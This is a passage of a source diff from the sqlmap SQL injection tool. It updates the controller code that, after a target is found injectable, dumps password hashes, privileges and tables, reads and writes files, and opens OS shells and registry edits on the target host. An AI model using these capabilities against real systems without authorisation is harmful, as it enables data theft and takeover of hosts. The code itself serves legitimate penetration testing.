FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
|
|
||||||
details.
|
|
||||||
|
|
||||||
You should have received a copy of the GNU General Public License along
|
|
||||||
with sqlmap; if not, write to the Free Software Foundation, Inc., 51
|
|
||||||
Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
|
|
||||||
"""
|
"""
|
||||||
|
|
||||||
pass
|
pass
|
||||||
|
|||||||
@@ -1,25 +0,0 @@
|
|||||||
#!/usr/bin/env python
|
|
||||||
|
|
||||||
"""
|
|
||||||
$Id$
|
|
||||||
|
|
||||||
This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
|
|
||||||
|
|
||||||
Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
|
|
||||||
and Daniele Bellucci <daniele.bellucci@gmail.com>
|
|
||||||
|
|
||||||
sqlmap is free software; you can redistribute it and/or modify it under
|
|
||||||
the terms of the GNU General Public License as published by the Free
|
|
||||||
Software Foundation version 2 of the License.
|
|
||||||
|
|
||||||
sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
|
|
||||||
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
|
|
||||||
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
|
|
||||||
details.
|
|
||||||
|
|
||||||
You should have received a copy of the GNU General Public License along
|
|
||||||
with sqlmap; if not, write to the Free Software Foundation, Inc., 51
|
|
||||||
Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
|
|
||||||
"""
|
|
||||||
|
|
||||||
pass
|
|
||||||
@@ -1,25 +1,8 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
$Id$
|
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
|
||||||
|
See the file 'doc/COPYING' for copying permission
|
||||||
This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
|
|
||||||
|
|
||||||
Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
|
|
||||||
and Daniele Bellucci <daniele.bellucci@gmail.com>
|
|
||||||
|
|
||||||
sqlmap is free software; you can redistribute it and/or modify it under
|
|
||||||
the terms of the GNU General Public License as published by the Free
|
|
||||||
Software Foundation version 2 of the License.
|
|
||||||
|
|
||||||
sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
|
|
||||||
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
|
|
||||||
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
|
|
||||||
details.
|
|
||||||
|
|
||||||
You should have received a copy of the GNU General Public License along
|
|
||||||
with sqlmap; if not, write to the Free Software Foundation, Inc., 51
|
|
||||||
Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
|
|
||||||
"""
|
"""
|
||||||
|
|
||||||
pass
|
pass
|
||||||
|
|||||||
@@ -1,55 +1,38 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
$Id$
|
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
|
||||||
|
See the file 'doc/COPYING' for copying permission
|
||||||
This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
|
|
||||||
|
|
||||||
Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
|
|
||||||
and Daniele Bellucci <daniele.bellucci@gmail.com>
|
|
||||||
|
|
||||||
sqlmap is free software; you can redistribute it and/or modify it under
|
|
||||||
the terms of the GNU General Public License as published by the Free
|
|
||||||
Software Foundation version 2 of the License.
|
|
||||||
|
|
||||||
sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
|
|
||||||
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
|
|
||||||
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
|
|
||||||
details.
|
|
||||||
|
|
||||||
You should have received a copy of the GNU General Public License along
|
|
||||||
with sqlmap; if not, write to the Free Software Foundation, Inc., 51
|
|
||||||
Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
|
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
from lib.controller.handler import setHandler
|
from lib.controller.handler import setHandler
|
||||||
from lib.core.common import getHtmlErrorFp
|
from lib.core.common import Backend
|
||||||
|
from lib.core.common import Format
|
||||||
from lib.core.data import conf
|
from lib.core.data import conf
|
||||||
from lib.core.data import kb
|
from lib.core.data import kb
|
||||||
from lib.core.dump import dumper
|
from lib.core.data import logger
|
||||||
from lib.core.exception import sqlmapUnsupportedDBMSException
|
from lib.core.data import paths
|
||||||
|
from lib.core.enums import CONTENT_TYPE
|
||||||
|
from lib.core.exception import SqlmapNoneDataException
|
||||||
|
from lib.core.exception import SqlmapUnsupportedDBMSException
|
||||||
from lib.core.settings import SUPPORTED_DBMS
|
from lib.core.settings import SUPPORTED_DBMS
|
||||||
from lib.techniques.blind.timebased import timeTest
|
from lib.techniques.brute.use import columnExists
|
||||||
from lib.techniques.inband.union.test import unionTest
|
from lib.techniques.brute.use import tableExists
|
||||||
from lib.techniques.outband.stacked import stackedTest
|
|
||||||
|
|
||||||
|
|
||||||
def action():
|
def action():
|
||||||
"""
|
"""
|
||||||
This function exploit the SQL injection on the affected
|
This function exploit the SQL injection on the affected
|
||||||
url parameter and extract requested data from the
|
URL parameter and extract requested data from the
|
||||||
back-end database management system or operating system
|
back-end database management system or operating system
|
||||||
if possible
|
if possible
|
||||||
"""
|
"""
|
||||||
|
|
||||||
# First of all we have to identify the back-end database management
|
# First of all we have to identify the back-end database management
|
||||||
# system to be able to go ahead with the injection
|
# system to be able to go ahead with the injection
|
||||||
conf.dbmsHandler = setHandler()
|
setHandler()
|
||||||
|
|
||||||
if not conf.dbmsHandler:
|
if not Backend.getDbms() or not conf.dbmsHandler:
|
||||||
htmlParsed = getHtmlErrorFp()
|
htmlParsed = Format.getErrorParsedDBMSes()
|
||||||
|
|
||||||
errMsg = "sqlmap was not able to fingerprint the "
|
errMsg = "sqlmap was not able to fingerprint the "
|
||||||
errMsg += "back-end database management system"
|
errMsg += "back-end database management system"
|
||||||
@@ -62,76 +45,142 @@ def action():
|
|||||||
if htmlParsed and htmlParsed.lower() in SUPPORTED_DBMS:
|
if htmlParsed and htmlParsed.lower() in SUPPORTED_DBMS:
|
||||||
errMsg += ". Do not specify the back-end DBMS manually, "
|
errMsg += ". Do not specify the back-end DBMS manually, "
|
||||||
errMsg += "sqlmap will fingerprint the DBMS for you"
|
errMsg += "sqlmap will fingerprint the DBMS for you"
|
||||||
|
elif kb.nullConnection:
|
||||||
|
errMsg += ". You can try to rerun without using optimization "
|
||||||
|
errMsg += "switch '%s'" % ("-o" if conf.optimize else "--null-connection")
|
||||||
else:
|
else:
|
||||||
errMsg += ". Support for this DBMS will be implemented if "
|
errMsg += ". Support for this DBMS will be implemented at "
|
||||||
errMsg += "you ask, just drop us an email"
|
errMsg += "some point"
|
||||||
|
|
||||||
raise sqlmapUnsupportedDBMSException, errMsg
|
raise SqlmapUnsupportedDBMSException(errMsg)
|
||||||
|
|
||||||
print "%s\n" % conf.dbmsHandler.getFingerprint()
|
conf.dumper.singleString(conf.dbmsHandler.getFingerprint())
|
||||||
|
|
||||||
# Techniques options
|
|
||||||
if conf.stackedTest:
|
|
||||||
dumper.string("stacked queries support", stackedTest())
|
|
||||||
|
|
||||||
if conf.timeTest:
|
|
||||||
dumper.string("time based blind sql injection payload", timeTest())
|
|
||||||
|
|
||||||
if conf.unionTest:
|
|
||||||
dumper.string("valid union", unionTest())
|
|
||||||
|
|
||||||
# Enumeration options
|
# Enumeration options
|
||||||
if conf.getBanner:
|
if conf.getBanner:
|
||||||
dumper.string("banner", conf.dbmsHandler.getBanner())
|
conf.dumper.banner(conf.dbmsHandler.getBanner())
|
||||||
|
|
||||||
if conf.getCurrentUser:
|
if conf.getCurrentUser:
|
||||||
dumper.string("current user", conf.dbmsHandler.getCurrentUser())
|
conf.dumper.currentUser(conf.dbmsHandler.getCurrentUser())
|
||||||
|
|
||||||
if conf.getCurrentDb:
|
if conf.getCurrentDb:
|
||||||
dumper.string("current database", conf.dbmsHandler.getCurrentDb())
|
conf.dumper.currentDb(conf.dbmsHandler.getCurrentDb())
|
||||||
|
|
||||||
|
if conf.getHostname:
|
||||||
|
conf.dumper.hostname(conf.dbmsHandler.getHostname())
|
||||||
|
|
||||||
if conf.isDba:
|
if conf.isDba:
|
||||||
dumper.string("current user is DBA", conf.dbmsHandler.isDba())
|
conf.dumper.dba(conf.dbmsHandler.isDba())
|
||||||
|
|
||||||
if conf.getUsers:
|
if conf.getUsers:
|
||||||
dumper.lister("database management system users", conf.dbmsHandler.getUsers())
|
conf.dumper.users(conf.dbmsHandler.getUsers())
|
||||||
|
|
||||||
if conf.getPasswordHashes:
|
if conf.getPasswordHashes:
|
||||||
dumper.userSettings("database management system users password hashes",
|
try:
|
||||||
conf.dbmsHandler.getPasswordHashes(), "password hash")
|
conf.dumper.userSettings("database management system users password hashes",
|
||||||
|
conf.dbmsHandler.getPasswordHashes(), "password hash", CONTENT_TYPE.PASSWORDS)
|
||||||
|
except SqlmapNoneDataException, ex:
|
||||||
|
logger.critical(ex)
|
||||||
|
except:
|
||||||
|
raise
|
||||||
|
|
||||||
if conf.getPrivileges:
|
if conf.getPrivileges:
|
||||||
dumper.userSettings("database management system users privileges",
|
try:
|
||||||
conf.dbmsHandler.getPrivileges(), "privilege")
|
conf.dumper.userSettings("database management system users privileges",
|
||||||
|
conf.dbmsHandler.getPrivileges(), "privilege", CONTENT_TYPE.PRIVILEGES)
|
||||||
|
except SqlmapNoneDataException, ex:
|
||||||
|
logger.critical(ex)
|
||||||
|
except:
|
||||||
|
raise
|
||||||
|
|
||||||
|
if conf.getRoles:
|
||||||
|
try:
|
||||||
|
conf.dumper.userSettings("database management system users roles",
|
||||||
|
conf.dbmsHandler.getRoles(), "role", CONTENT_TYPE.ROLES)
|
||||||
|
except SqlmapNoneDataException, ex:
|
||||||
|
logger.critical(ex)
|
||||||
|
except:
|
||||||
|
raise
|
||||||
|
|
||||||
if conf.getDbs:
|
if conf.getDbs:
|
||||||
dumper.lister("available databases", conf.dbmsHandler.getDbs())
|
conf.dumper.dbs(conf.dbmsHandler.getDbs())
|
||||||
|
|
||||||
if conf.getTables:
|
if conf.getTables:
|
||||||
dumper.dbTables(conf.dbmsHandler.getTables())
|
conf.dumper.dbTables(conf.dbmsHandler.getTables())
|
||||||
|
|
||||||
|
if conf.commonTables:
|
||||||
|
conf.dumper.dbTables(tableExists(paths.COMMON_TABLES))
|
||||||
|
|
||||||
|
if conf.getSchema:
|
||||||
|
conf.dumper.dbTableColumns(conf.dbmsHandler.getSchema(), CONTENT_TYPE.SCHEMA)
|
||||||
|
|
||||||
if conf.getColumns:
|
if conf.getColumns:
|
||||||
dumper.dbTableColumns(conf.dbmsHandler.getColumns())
|
conf.dumper.dbTableColumns(conf.dbmsHandler.getColumns(), CONTENT_TYPE.COLUMNS)
|
||||||
|
|
||||||
|
if conf.getCount:
|
||||||
|
conf.dumper.dbTablesCount(conf.dbmsHandler.getCount())
|
||||||
|
|
||||||
|
if conf.commonColumns:
|
||||||
|
conf.dumper.dbTableColumns(columnExists(paths.COMMON_COLUMNS))
|
||||||
|
|
||||||
if conf.dumpTable:
|
if conf.dumpTable:
|
||||||
dumper.dbTableValues(conf.dbmsHandler.dumpTable())
|
conf.dbmsHandler.dumpTable()
|
||||||
|
|
||||||
if conf.dumpAll:
|
if conf.dumpAll:
|
||||||
conf.dbmsHandler.dumpAll()
|
conf.dbmsHandler.dumpAll()
|
||||||
|
|
||||||
|
if conf.search:
|
||||||
|
conf.dbmsHandler.search()
|
||||||
|
|
||||||
if conf.query:
|
if conf.query:
|
||||||
dumper.string(conf.query, conf.dbmsHandler.sqlQuery(conf.query))
|
conf.dumper.query(conf.query, conf.dbmsHandler.sqlQuery(conf.query))
|
||||||
|
|
||||||
if conf.sqlShell:
|
if conf.sqlShell:
|
||||||
conf.dbmsHandler.sqlShell()
|
conf.dbmsHandler.sqlShell()
|
||||||
|
|
||||||
|
if conf.sqlFile:
|
||||||
|
conf.dbmsHandler.sqlFile()
|
||||||
|
|
||||||
|
# User-defined function options
|
||||||
|
if conf.udfInject:
|
||||||
|
conf.dbmsHandler.udfInjectCustom()
|
||||||
|
|
||||||
# File system options
|
# File system options
|
||||||
if conf.rFile:
|
if conf.rFile:
|
||||||
dumper.string(conf.rFile, conf.dbmsHandler.readFile(conf.rFile))
|
conf.dumper.rFile(conf.dbmsHandler.readFile(conf.rFile))
|
||||||
|
|
||||||
if conf.wFile:
|
if conf.wFile:
|
||||||
dumper.string(conf.wFile, conf.dbmsHandler.writeFile(conf.wFile))
|
conf.dbmsHandler.writeFile(conf.wFile, conf.dFile, conf.wFileType)
|
||||||
|
|
||||||
|
# Operating system options
|
||||||
|
if conf.osCmd:
|
||||||
|
conf.dbmsHandler.osCmd()
|
||||||
|
|
||||||
# Takeover options
|
|
||||||
if conf.osShell:
|
if conf.osShell:
|
||||||
conf.dbmsHandler.osShell()
|
conf.dbmsHandler.osShell()
|
||||||
|
|
||||||
|
if conf.osPwn:
|
||||||
|
conf.dbmsHandler.osPwn()
|
||||||
|
|
||||||
|
if conf.osSmb:
|
||||||
|
conf.dbmsHandler.osSmb()
|
||||||
|
|
||||||
|
if conf.osBof:
|
||||||
|
conf.dbmsHandler.osBof()
|
||||||
|
|
||||||
|
# Windows registry options
|
||||||
|
if conf.regRead:
|
||||||
|
conf.dumper.registerValue(conf.dbmsHandler.regRead())
|
||||||
|
|
||||||
|
if conf.regAdd:
|
||||||
|
conf.dbmsHandler.regAdd()
|
||||||
|
|
||||||
|
if conf.regDel:
|
||||||
|
conf.dbmsHandler.regDel()
|
||||||
|
|
||||||
|
# Miscellaneous options
|
||||||
|
if conf.cleanup:
|
||||||
|
conf.dbmsHandler.cleanup()
|
||||||
|
|
||||||
|
if conf.direct:
|
||||||
|
conf.dbmsConnector.close()
|
||||||
|
|||||||
File diff suppressed because it is too large
Load Diff
@@ -1,28 +1,12 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
$Id$
|
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
|
||||||
|
See the file 'doc/COPYING' for copying permission
|
||||||
This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
|
|
||||||
|
|
||||||
Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
|
|
||||||
and Daniele Bellucci <daniele.bellucci@gmail.com>
|
|
||||||
|
|
||||||
sqlmap is free software; you can redistribute it and/or modify it under
|
|
||||||
the terms of the GNU General Public License as published by the Free
|
|
||||||
Software Foundation version 2 of the License.
|
|
||||||
|
|
||||||
sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
|
|
||||||
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
|
|
||||||
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
|
|
||||||
details.
|
|
||||||
|
|
||||||
You should have received a copy of the GNU General Public License along
|
|
||||||
with sqlmap; if not, write to the Free Software Foundation, Inc., 51
|
|
||||||
Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
|
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
import os
|
||||||
|
import re
|
||||||
|
|
||||||
from lib.controller.action import action
|
from lib.controller.action import action
|
||||||
from lib.controller.checks import checkSqlInjection
|
from lib.controller.checks import checkSqlInjection
|
||||||
@@ -31,59 +15,235 @@ from lib.controller.checks import checkStability
|
|||||||
from lib.controller.checks import checkString
|
from lib.controller.checks import checkString
|
||||||
from lib.controller.checks import checkRegexp
|
from lib.controller.checks import checkRegexp
|
||||||
from lib.controller.checks import checkConnection
|
from lib.controller.checks import checkConnection
|
||||||
from lib.core.common import paramToDict
|
from lib.controller.checks import checkNullConnection
|
||||||
|
from lib.controller.checks import checkWaf
|
||||||
|
from lib.controller.checks import heuristicCheckSqlInjection
|
||||||
|
from lib.controller.checks import identifyWaf
|
||||||
|
from lib.core.agent import agent
|
||||||
|
from lib.core.common import dataToStdout
|
||||||
|
from lib.core.common import extractRegexResult
|
||||||
|
from lib.core.common import getFilteredPageContent
|
||||||
|
from lib.core.common import getPublicTypeMembers
|
||||||
|
from lib.core.common import getSafeExString
|
||||||
|
from lib.core.common import hashDBRetrieve
|
||||||
|
from lib.core.common import hashDBWrite
|
||||||
|
from lib.core.common import intersect
|
||||||
|
from lib.core.common import isListLike
|
||||||
|
from lib.core.common import parseTargetUrl
|
||||||
|
from lib.core.common import popValue
|
||||||
|
from lib.core.common import pushValue
|
||||||
|
from lib.core.common import randomStr
|
||||||
from lib.core.common import readInput
|
from lib.core.common import readInput
|
||||||
|
from lib.core.common import safeCSValue
|
||||||
|
from lib.core.common import showHttpErrorCodes
|
||||||
|
from lib.core.common import urlencode
|
||||||
|
from lib.core.common import urldecode
|
||||||
from lib.core.data import conf
|
from lib.core.data import conf
|
||||||
from lib.core.data import kb
|
from lib.core.data import kb
|
||||||
from lib.core.data import logger
|
from lib.core.data import logger
|
||||||
from lib.core.exception import sqlmapConnectionException
|
from lib.core.enums import CONTENT_TYPE
|
||||||
from lib.core.exception import sqlmapNotVulnerableException
|
from lib.core.enums import HASHDB_KEYS
|
||||||
from lib.core.session import setInjection
|
from lib.core.enums import HEURISTIC_TEST
|
||||||
from lib.core.target import createTargetDirs
|
from lib.core.enums import HTTPMETHOD
|
||||||
|
from lib.core.enums import NOTE
|
||||||
|
from lib.core.enums import PAYLOAD
|
||||||
|
from lib.core.enums import PLACE
|
||||||
|
from lib.core.exception import SqlmapBaseException
|
||||||
|
from lib.core.exception import SqlmapNoneDataException
|
||||||
|
from lib.core.exception import SqlmapNotVulnerableException
|
||||||
|
from lib.core.exception import SqlmapSilentQuitException
|
||||||
|
from lib.core.exception import SqlmapValueException
|
||||||
|
from lib.core.exception import SqlmapUserQuitException
|
||||||
|
from lib.core.settings import ASP_NET_CONTROL_REGEX
|
||||||
|
from lib.core.settings import DEFAULT_GET_POST_DELIMITER
|
||||||
|
from lib.core.settings import EMPTY_FORM_FIELDS_REGEX
|
||||||
|
from lib.core.settings import IGNORE_PARAMETERS
|
||||||
|
from lib.core.settings import LOW_TEXT_PERCENT
|
||||||
|
from lib.core.settings import GOOGLE_ANALYTICS_COOKIE_PREFIX
|
||||||
|
from lib.core.settings import HOST_ALIASES
|
||||||
|
from lib.core.settings import REFERER_ALIASES
|
||||||
|
from lib.core.settings import USER_AGENT_ALIASES
|
||||||
from lib.core.target import initTargetEnv
|
from lib.core.target import initTargetEnv
|
||||||
from lib.utils.parenthesis import checkForParenthesis
|
from lib.core.target import setupTargetEnv
|
||||||
|
from thirdparty.pagerank.pagerank import get_pagerank
|
||||||
|
|
||||||
|
def _selectInjection():
|
||||||
def __selectInjection(injData):
|
|
||||||
"""
|
"""
|
||||||
Selection function for injection place, parameters and type.
|
Selection function for injection place, parameters and type.
|
||||||
"""
|
"""
|
||||||
|
|
||||||
message = "there were multiple injection points, please select the "
|
points = {}
|
||||||
message += "one to use to go ahead:\n"
|
|
||||||
|
|
||||||
for i in xrange(0, len(injData)):
|
for injection in kb.injections:
|
||||||
injPlace = injData[i][0]
|
place = injection.place
|
||||||
injParameter = injData[i][1]
|
parameter = injection.parameter
|
||||||
injType = injData[i][2]
|
ptype = injection.ptype
|
||||||
|
|
||||||
message += "[%d] place: %s, parameter: " % (i, injPlace)
|
point = (place, parameter, ptype)
|
||||||
message += "%s, type: %s" % (injParameter, injType)
|
|
||||||
|
if point not in points:
|
||||||
|
points[point] = injection
|
||||||
|
else:
|
||||||
|
for key in points[point].keys():
|
||||||
|
if key != 'data':
|
||||||
|
points[point][key] = points[point][key] or injection[key]
|
||||||
|
points[point]['data'].update(injection['data'])
|
||||||
|
|
||||||
|
if len(points) == 1:
|
||||||
|
kb.injection = kb.injections[0]
|
||||||
|
|
||||||
|
elif len(points) > 1:
|
||||||
|
message = "there were multiple injection points, please select "
|
||||||
|
message += "the one to use for following injections:\n"
|
||||||
|
|
||||||
|
points = []
|
||||||
|
|
||||||
|
for i in xrange(0, len(kb.injections)):
|
||||||
|
place = kb.injections[i].place
|
||||||
|
parameter = kb.injections[i].parameter
|
||||||
|
ptype = kb.injections[i].ptype
|
||||||
|
point = (place, parameter, ptype)
|
||||||
|
|
||||||
|
if point not in points:
|
||||||
|
points.append(point)
|
||||||
|
ptype = PAYLOAD.PARAMETER[ptype] if isinstance(ptype, int) else ptype
|
||||||
|
|
||||||
|
message += "[%d] place: %s, parameter: " % (i, place)
|
||||||
|
message += "%s, type: %s" % (parameter, ptype)
|
||||||
|
|
||||||
if i == 0:
|
if i == 0:
|
||||||
message += " (default)"
|
message += " (default)"
|
||||||
|
|
||||||
message += "\n"
|
message += "\n"
|
||||||
|
|
||||||
message += "[q] Quit\nChoice: "
|
message += "[q] Quit"
|
||||||
select = readInput(message, default="0")
|
select = readInput(message, default="0")
|
||||||
|
|
||||||
if not select:
|
if select.isdigit() and int(select) < len(kb.injections) and int(select) >= 0:
|
||||||
index = 0
|
|
||||||
|
|
||||||
elif select.isdigit() and int(select) < len(injData) and int(select) >= 0:
|
|
||||||
index = int(select)
|
index = int(select)
|
||||||
|
elif select[0] in ("Q", "q"):
|
||||||
elif select[0] in ( "Q", "q" ):
|
raise SqlmapUserQuitException
|
||||||
return "Quit"
|
|
||||||
|
|
||||||
else:
|
else:
|
||||||
warnMsg = "Invalid choice, retry"
|
errMsg = "invalid choice"
|
||||||
|
raise SqlmapValueException(errMsg)
|
||||||
|
|
||||||
|
kb.injection = kb.injections[index]
|
||||||
|
|
||||||
|
def _formatInjection(inj):
|
||||||
|
paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else inj.place
|
||||||
|
data = "Parameter: %s (%s)\n" % (inj.parameter, paramType)
|
||||||
|
|
||||||
|
for stype, sdata in inj.data.items():
|
||||||
|
title = sdata.title
|
||||||
|
vector = sdata.vector
|
||||||
|
comment = sdata.comment
|
||||||
|
payload = agent.adjustLateValues(sdata.payload)
|
||||||
|
if inj.place == PLACE.CUSTOM_HEADER:
|
||||||
|
payload = payload.split(',', 1)[1]
|
||||||
|
if stype == PAYLOAD.TECHNIQUE.UNION:
|
||||||
|
count = re.sub(r"(?i)(\(.+\))|(\blimit[^A-Za-z]+)", "", sdata.payload).count(',') + 1
|
||||||
|
title = re.sub(r"\d+ to \d+", str(count), title)
|
||||||
|
vector = agent.forgeUnionQuery("[QUERY]", vector[0], vector[1], vector[2], None, None, vector[5], vector[6])
|
||||||
|
if count == 1:
|
||||||
|
title = title.replace("columns", "column")
|
||||||
|
elif comment:
|
||||||
|
vector = "%s%s" % (vector, comment)
|
||||||
|
data += " Type: %s\n" % PAYLOAD.SQLINJECTION[stype]
|
||||||
|
data += " Title: %s\n" % title
|
||||||
|
data += " Payload: %s\n" % urldecode(payload, unsafe="&", plusspace=(inj.place != PLACE.GET and kb.postSpaceToPlus))
|
||||||
|
data += " Vector: %s\n\n" % vector if conf.verbose > 1 else "\n"
|
||||||
|
|
||||||
|
return data
|
||||||
|
|
||||||
|
def _showInjections():
|
||||||
|
if kb.testQueryCount > 0:
|
||||||
|
header = "sqlmap identified the following injection point(s) with "
|
||||||
|
header += "a total of %d HTTP(s) requests" % kb.testQueryCount
|
||||||
|
else:
|
||||||
|
header = "sqlmap resumed the following injection point(s) from stored session"
|
||||||
|
|
||||||
|
if hasattr(conf, "api"):
|
||||||
|
conf.dumper.string("", kb.injections, content_type=CONTENT_TYPE.TECHNIQUES)
|
||||||
|
else:
|
||||||
|
data = "".join(set(map(lambda x: _formatInjection(x), kb.injections))).rstrip("\n")
|
||||||
|
conf.dumper.string(header, data)
|
||||||
|
|
||||||
|
if conf.tamper:
|
||||||
|
warnMsg = "changes made by tampering scripts are not "
|
||||||
|
warnMsg += "included in shown payload content(s)"
|
||||||
logger.warn(warnMsg)
|
logger.warn(warnMsg)
|
||||||
__selectInjection(injData)
|
|
||||||
|
|
||||||
return injData[index]
|
if conf.hpp:
|
||||||
|
warnMsg = "changes made by HTTP parameter pollution are not "
|
||||||
|
warnMsg += "included in shown payload content(s)"
|
||||||
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
|
def _randomFillBlankFields(value):
|
||||||
|
retVal = value
|
||||||
|
|
||||||
|
if extractRegexResult(EMPTY_FORM_FIELDS_REGEX, value):
|
||||||
|
message = "do you want to fill blank fields with random values? [Y/n] "
|
||||||
|
test = readInput(message, default="Y")
|
||||||
|
if not test or test[0] in ("y", "Y"):
|
||||||
|
for match in re.finditer(EMPTY_FORM_FIELDS_REGEX, retVal):
|
||||||
|
item = match.group("result")
|
||||||
|
if not any(_ in item for _ in IGNORE_PARAMETERS) and not re.search(ASP_NET_CONTROL_REGEX, item):
|
||||||
|
if item[-1] == DEFAULT_GET_POST_DELIMITER:
|
||||||
|
retVal = retVal.replace(item, "%s%s%s" % (item[:-1], randomStr(), DEFAULT_GET_POST_DELIMITER))
|
||||||
|
else:
|
||||||
|
retVal = retVal.replace(item, "%s%s" % (item, randomStr()))
|
||||||
|
|
||||||
|
return retVal
|
||||||
|
|
||||||
|
def _saveToHashDB():
|
||||||
|
injections = hashDBRetrieve(HASHDB_KEYS.KB_INJECTIONS, True)
|
||||||
|
if not isListLike(injections):
|
||||||
|
injections = []
|
||||||
|
injections.extend(_ for _ in kb.injections if _ and _.place is not None and _.parameter is not None)
|
||||||
|
|
||||||
|
_ = dict()
|
||||||
|
for injection in injections:
|
||||||
|
key = (injection.place, injection.parameter, injection.ptype)
|
||||||
|
if key not in _:
|
||||||
|
_[key] = injection
|
||||||
|
else:
|
||||||
|
_[key].data.update(injection.data)
|
||||||
|
hashDBWrite(HASHDB_KEYS.KB_INJECTIONS, _.values(), True)
|
||||||
|
|
||||||
|
_ = hashDBRetrieve(HASHDB_KEYS.KB_ABS_FILE_PATHS, True)
|
||||||
|
hashDBWrite(HASHDB_KEYS.KB_ABS_FILE_PATHS, kb.absFilePaths | (_ if isinstance(_, set) else set()), True)
|
||||||
|
|
||||||
|
if not hashDBRetrieve(HASHDB_KEYS.KB_CHARS):
|
||||||
|
hashDBWrite(HASHDB_KEYS.KB_CHARS, kb.chars, True)
|
||||||
|
|
||||||
|
if not hashDBRetrieve(HASHDB_KEYS.KB_DYNAMIC_MARKINGS):
|
||||||
|
hashDBWrite(HASHDB_KEYS.KB_DYNAMIC_MARKINGS, kb.dynamicMarkings, True)
|
||||||
|
|
||||||
|
def _saveToResultsFile():
|
||||||
|
if not conf.resultsFP:
|
||||||
|
return
|
||||||
|
|
||||||
|
results = {}
|
||||||
|
techniques = dict(map(lambda x: (x[1], x[0]), getPublicTypeMembers(PAYLOAD.TECHNIQUE)))
|
||||||
|
|
||||||
|
for injection in kb.injections + kb.falsePositives:
|
||||||
|
if injection.place is None or injection.parameter is None:
|
||||||
|
continue
|
||||||
|
|
||||||
|
key = (injection.place, injection.parameter, ';'.join(injection.notes))
|
||||||
|
if key not in results:
|
||||||
|
results[key] = []
|
||||||
|
|
||||||
|
results[key].extend(injection.data.keys())
|
||||||
|
|
||||||
|
for key, value in results.items():
|
||||||
|
place, parameter, notes = key
|
||||||
|
line = "%s,%s,%s,%s,%s%s" % (safeCSValue(kb.originalUrls.get(conf.url) or conf.url), place, parameter, "".join(map(lambda x: techniques[x][0].upper(), sorted(value))), notes, os.linesep)
|
||||||
|
conf.resultsFP.writelines(line)
|
||||||
|
|
||||||
|
if not results:
|
||||||
|
line = "%s,,,,%s" % (conf.url, os.linesep)
|
||||||
|
conf.resultsFP.writelines(line)
|
||||||
|
|
||||||
def start():
|
def start():
|
||||||
"""
|
"""
|
||||||
@@ -92,176 +252,437 @@ def start():
|
|||||||
check if they are dynamic and SQL injection affected
|
check if they are dynamic and SQL injection affected
|
||||||
"""
|
"""
|
||||||
|
|
||||||
if conf.url:
|
if conf.direct:
|
||||||
kb.targetUrls.add(( conf.url, conf.method, conf.data, conf.cookie ))
|
initTargetEnv()
|
||||||
|
setupTargetEnv()
|
||||||
|
action()
|
||||||
|
return True
|
||||||
|
|
||||||
if conf.configFile and not kb.targetUrls:
|
if conf.url and not any((conf.forms, conf.crawlDepth)):
|
||||||
|
kb.targets.add((conf.url, conf.method, conf.data, conf.cookie, None))
|
||||||
|
|
||||||
|
if conf.configFile and not kb.targets:
|
||||||
errMsg = "you did not edit the configuration file properly, set "
|
errMsg = "you did not edit the configuration file properly, set "
|
||||||
errMsg += "the target url, list of targets or google dork"
|
errMsg += "the target URL, list of targets or google dork"
|
||||||
logger.error(errMsg)
|
logger.error(errMsg)
|
||||||
|
return False
|
||||||
|
|
||||||
if kb.targetUrls and len(kb.targetUrls) > 1:
|
if kb.targets and len(kb.targets) > 1:
|
||||||
infoMsg = "sqlmap got a total of %d targets" % len(kb.targetUrls)
|
infoMsg = "sqlmap got a total of %d targets" % len(kb.targets)
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
hostCount = 0
|
hostCount = 0
|
||||||
receivedCookies = []
|
initialHeaders = list(conf.httpHeaders)
|
||||||
cookieStr = ""
|
|
||||||
setCookieAsInjectable = True
|
|
||||||
|
|
||||||
for targetUrl, targetMethod, targetData, targetCookie in kb.targetUrls:
|
for targetUrl, targetMethod, targetData, targetCookie, targetHeaders in kb.targets:
|
||||||
|
try:
|
||||||
conf.url = targetUrl
|
conf.url = targetUrl
|
||||||
conf.method = targetMethod
|
conf.method = targetMethod.upper() if targetMethod else targetMethod
|
||||||
conf.data = targetData
|
conf.data = targetData
|
||||||
conf.cookie = targetCookie
